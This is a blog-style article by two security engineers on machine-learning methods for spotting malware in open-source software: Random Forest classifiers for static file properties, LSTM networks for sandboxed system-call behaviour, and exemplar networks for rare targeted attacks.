ML for checking the code and behavior of opensource solutions

Boris Zahir

Development Engineer, Development Department of the Security Vision Production Department

Ekaterina Gainullina

Information Security Engineer, Development Department of the Security Vision Production Department

Introduction

In the last article, we looked at the possibilities of checking open source in various ways, vendor and independent. In general, frequently checking updates for suspicious or even malicious activity is a painstaking, responsible thing, and if done manually, it takes a lot of time.

There are various ways to automate this process, but in the context of the fact that methods of disguising malware as legitimate software are evolving day by day, the process of identifying it should also develop at an almost faster pace.

Artificial intelligence

In the early days of the antivirus industry, detection of malware on computers was based on heuristic functions that identified specific malicious files by:

• code fragments

• hashes of code fragments or the entire file

• file properties

• and combinations of these functions.

The main goal was to create a reliable fingerprint – a combination of characteristics – of a malicious file that could be quickly verified.

Machine learning algorithms stand out for their ability to adapt to an ever-changing environment. They don't just follow known patterns, but actively adapt to new capabilities of hackers.

File information is collected at two different stages:

  • Before execution, that is, before the file's code is executed in any way. At this stage, information about the file format, its source code or code description, binary representation data, and other similar information may be recorded.

  • After execution, the collected data about the file consists of logs of system events and calls that occur during its execution (within an isolated environment – sandbox).

Machine learning can be applied to both types of data. Let's look at the classic approaches to each.

Classification based on static file properties

In the context of open source malware detection, one powerful machine learning tool is the Random Forest algorithm. This technique is especially effective when working with static file properties such as code snippets, hashes, metadata, and executable file structure.

Random Forest works by generating many decision trees based on different subsets and attributes of the input data. Each decision tree in the algorithm analyzes a specific set of file characteristics, such as lines of code, import/export symbols, binary patterns, and other static attributes. These trees work independently of each other, providing their own predictions about whether a file is malicious or not.

The advantage of this approach is its ability to adapt to new types of malware.

Behavioral file analysis using recurrent networks

Recurrent neural networks (RNN) and their variants, such as Long Short-Term Memory (LSTM) networks, are ideal for analyzing the behavior of files, especially when it comes to the sequence of system calls made by a file during its execution.

RNNs are capable of processing temporal sequence data by storing information about previous states in their memory. This allows them to analyze the behavior of the file not only at the current moment of the sandbox simulation, but also to take into account its previous activity in a cumulative manner. This approach is important for identifying complex patterns of behavior that are often characteristic of malware.

LSTM, a type of RNN, is particularly effective at processing long sequences of data. It is able to “remember” important information over both long and short periods of time, and ignore irrelevant data. This makes LSTMs particularly suitable for analyzing complex and long-lasting behavioral patterns, such as series of branched system calls, changes to the system registry, operations on user policies or on files that may indicate malicious activity.

LSTM networks, an advanced form of RNN, are based on structures called gates, which allow the model to distribute information in its memory. There are three main types of gates: a forget gate, an input gate, and an output gate. The forget gate decides what information from the previous state should be “forgotten” or discarded, the input gate determines what new data should be added to the cell state, and the output gate controls what information from the current cell state should be used in the network output.

By applying LSTM to the analysis of virus system call sequences, the model is able to effectively learn complex and variable patterns of behavior that may not be obvious from static analysis. For example, a virus may perform a series of routine file operations to disguise its malicious activity, such as copying or modifying system files. LSTM is able to recognize such behavioral anomalies by analyzing the sequence and context of these operations.

In addition, LSTM effectively deals with other dynamic characteristics of programs, such as changes in system registries or the creation and deletion of processes, which are often indicators of malicious activity. This is especially important for detecting advanced malware that can mask its actions or change its behavior over time.

Deep learning against uncommon attacks

Typically, machine learning faces challenges when both malicious and benign samples are present in large numbers in the training set. But some attacks are so rare that we only have one example of malware to study with. This is typical for high-profile targeted attacks. In this case, a very specific model architecture is used, based on deep learning. This approach is called exemplar network (ExNet).

The idea here is that the model is trained to create compact representations of the input features. These are then used to simultaneously train multiple classifiers for each example—algorithms that detect specific types of malware. Deep learning allows you to combine these multiple steps (extracting object features, compact feature representation, and creating a local model or model for each sample) into a single neural network pipeline that extracts distinctive features for different types of malware.

This model can effectively generalize knowledge about individual malware samples and a large collection of clean samples. It can then detect new modifications of the corresponding malware.

  Figure 1. Example of the exemplar network (ExNet) algorithm [https://media.kaspersky.com/en/enterprise-security/Kaspersky-Lab-Whitepaper-Machine-Learning.pdf]

Figure 1. Example of the exemplar network (ExNet) algorithm [https://media.kaspersky.com/en/enterprise-security/Kaspersky-Lab-Whitepaper-Machine-Learning.pdf]

Results

In the ongoing fight against malware, one of the key strategies is to create reliable fingerprints to quickly verify files. This is where powerful machine learning algorithms come into play, capable of not only observing known patterns, but also adapting to hackers' clever new tactics.

By using various methods for checking suspicious code, you can significantly improve and speed up the software update process, which, in turn, also speeds up the related process – patch management.

In two stages of information collection – before and after file execution – machine learning reaches its full potential. At the first stage, the Random Forest algorithm works great with static file properties, identifying code fragments, hashes and the structure of the executable file. Using multiple decision trees, each analyzing a unique set of characteristics, this method ensures adaptability to new threats.

The second stage – after execution – becomes the arena for recurrent neural networks (RNNs) and their derivatives such as LSTMs. These networks analyze sequences of system calls, remembering previous states and providing a comprehensive view of a file's behavior. This method is ideal for identifying complex malware patterns, highlighting the importance of analyzing behavior dynamics.

Not everyone will adapt the automation of searching for suspicious patterns so much just to use free software, but the very presence of such an option is already good. And then everyone decides for themselves.

Similar Posts

Leave a Reply

Your email address will not be published. Required fields are marked *